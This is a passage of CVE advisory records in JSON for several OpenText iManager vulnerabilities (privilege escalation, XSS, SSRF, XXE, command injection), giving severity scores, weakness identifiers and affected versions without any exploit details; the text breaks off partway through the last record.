    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-26 14:19
    VLAI
    Title
    Possible Local Privilege Escalation Vulnerability in OpenText iManager
    Summary
    Possible improper input validation Vulnerability in iManager has been discovered in OpenText™ iManager 3.2.4.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-250 - Execution with Unnecessary Privileges
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm, exe)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38118",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-22T17:44:16.954696Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-26T14:19:33.603Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.4.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible improper input validation Vulnerability\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.4.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible improper input validation Vulnerability\n\nin iManager has been discovered in\nOpenText\u2122 iManager 3.2.4.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-69",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-69 Target Programs with Elevated Privileges"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "availabilityImpact": "NONE",
                "baseScore": 5.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-250",
                  "description": "CWE-250: Execution with Unnecessary Privileges",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:40.183Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager325_releasenotes/data/imanager325_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Local Privilege Escalation Vulnerability in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38118",
        "datePublished": "2024-11-22T15:34:40.183Z",
        "dateReserved": "2021-08-04T20:57:01.488Z",
        "dateUpdated": "2024-11-26T14:19:33.603Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38119 (GCVE-0-2021-38119)

    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-26 14:19
    VLAI
    Title
    Possible Reflected Cross-Site Scripting (XSS) Vulnerability in OpenText iManager
    Summary
    Possible Reflected Cross-Site Scripting (XSS) Vulnerability in iManager has been discovered in OpenText™ iManager 3.2.4.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm, exe)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38119",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-22T17:44:18.309502Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-26T14:19:46.120Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.4.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible Reflected Cross-Site Scripting (XSS) Vulnerability\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.4.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible Reflected Cross-Site Scripting (XSS) Vulnerability\n\nin iManager has been discovered in\nOpenText\u2122 iManager 3.2.4.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-591",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-591 Reflected XSS"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:38.178Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager325_releasenotes/data/imanager325_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Reflected Cross-Site Scripting (XSS) Vulnerability in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38119",
        "datePublished": "2024-11-22T15:34:38.178Z",
        "dateReserved": "2021-08-04T20:57:01.488Z",
        "dateUpdated": "2024-11-26T14:19:46.120Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38134 (GCVE-0-2021-38134)

    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-26 14:19
    VLAI
    Title
    Possible Reflected and Stored XSS in OpenText iManager
    Summary
    Possible XSS in iManager URL for access Component has been discovered in OpenText™ iManager 3.2.5.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.5.0000 (rpm, exe)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38134",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-22T17:44:19.614412Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-26T14:19:55.618Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.5.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible XSS in iManager URL for access Component \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.5.0000\u003c/strong\u003e\u003cstrong\u003e. \u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible XSS in iManager URL for access Component has been discovered in\nOpenText\u2122 iManager 3.2.5.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-591",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-591 Reflected XSS"
                }
              ]
            },
            {
              "capecId": "CAPEC-592",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-592 Stored XSS"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:36.023Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager326_releasenotes/data/imanager326_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Reflected and Stored XSS in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38134",
        "datePublished": "2024-11-22T15:34:36.023Z",
        "dateReserved": "2021-08-04T20:57:01.492Z",
        "dateUpdated": "2024-11-26T14:19:55.618Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38135 (GCVE-0-2021-38135)

    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:11
    VLAI
    Title
    Possible External service interaction Vulnerability in OpenText iManager
    Summary
    Possible External Service Interaction attack in iManager has been discovered in OpenText™ iManager 3.2.6.0000.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-918 - Server-Side Request Forgery (SSRF)
    • CWE-406 - Insufficient Control of Network Message Volume (Network Amplification)
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.5.0000 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.5.0000 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.5.0000",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38135",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:09:31.987983Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:11:18.827Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.5.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible \nExternal Service Interaction attack\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.6.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible \nExternal Service Interaction attack\n\nin iManager has been discovered in\nOpenText\u2122 iManager 3.2.6.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-664",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-664 Server Side Request Forgery"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 8.6,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-918",
                  "description": "CWE-918 Server-Side Request Forgery (SSRF)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-406",
                  "description": "CWE-406: Insufficient Control of Network Message Volume (Network Amplification)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:34.561Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager326_releasenotes/data/imanager326_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible External service interaction Vulnerability in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38135",
        "datePublished": "2024-11-22T15:34:34.561Z",
        "dateReserved": "2021-08-04T20:57:01.492Z",
        "dateUpdated": "2024-11-25T18:11:18.827Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-26324 (GCVE-0-2022-26324)

    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-26 14:20
    VLAI
    Title
    Possible XSS in iManager URL for access Component
    Summary
    Possible XSS in iManager URL for access Component has been discovered in OpenText™ iManager 3.2.6.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.6.0000 (rpm, exe)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-26324",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-22T17:44:21.253037Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-26T14:20:05.412Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.6.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible XSS in iManager URL for access Component \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.6.0000\u003c/strong\u003e\u003cstrong\u003e. \u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible XSS in iManager URL for access Component has been discovered in\nOpenText\u2122 iManager 3.2.6.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-63",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-63 Cross-Site Scripting (XSS)"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.6,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "LOW",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:33.159Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/pdfdoc/imanager326_patch1_releasenotes/imanager326_patch1_releasenotes.pdf"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible XSS in iManager URL for access Component",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2022-26324",
        "datePublished": "2024-11-22T15:34:33.159Z",
        "dateReserved": "2022-02-28T21:48:42.461Z",
        "dateUpdated": "2024-11-26T14:20:05.412Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-24466 (GCVE-0-2023-24466)

    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:12
    VLAI
    Title
    Possible XML External Entity Injection in OpenText iManager
    Summary
    Possible XML External Entity Injection in iManager GET parameter has been discovered in OpenText™ iManager 3.2.6.0200.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-611 - Improper Restriction of XML External Entity Reference
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.6.0200 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.6.0200 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.6.0200",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2023-24466",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:09:43.291349Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:12:11.291Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.6.0200",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible XML External Entity Injection\n\n\n in iManager GET parameter \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.6.0200\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible XML External Entity Injection\n\n\n in iManager GET parameter has been discovered in\nOpenText\u2122 iManager 3.2.6.0200."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-221",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-221 Data Serialization External Entities Blowup"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-611",
                  "description": "CWE-611 Improper Restriction of XML External Entity Reference",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:31.683Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/pdfdoc/imanager326_patch3_releasenotes/imanager326_patch3_releasenotes.pdf"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible XML External Entity Injection in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2023-24466",
        "datePublished": "2024-11-22T15:34:31.683Z",
        "dateReserved": "2023-01-23T21:31:58.769Z",
        "dateUpdated": "2024-11-25T18:12:11.291Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-24467 (GCVE-0-2023-24467)

    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:12
    VLAI
    Title
    Possible Command Injection in OpenText iManager
    Summary
    Possible Command Injection in iManager GET parameter has been discovered in OpenText™ iManager 3.2.6.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
    • CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.6.0200 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.6.0200 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.6.0200",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2023-24467",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:09:55.699628Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:12:56.534Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.6.0200",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible Command Injection\n\n\n in iManager GET parameter \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.6.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible Command Injection\n\n\n in iManager GET parameter has been discovered in\nOpenText\u2122 iManager 3.2.6.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-88",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-88 OS Command Injection"
                }
              ]
            },
            {
              "capecId": "CAPEC-248",
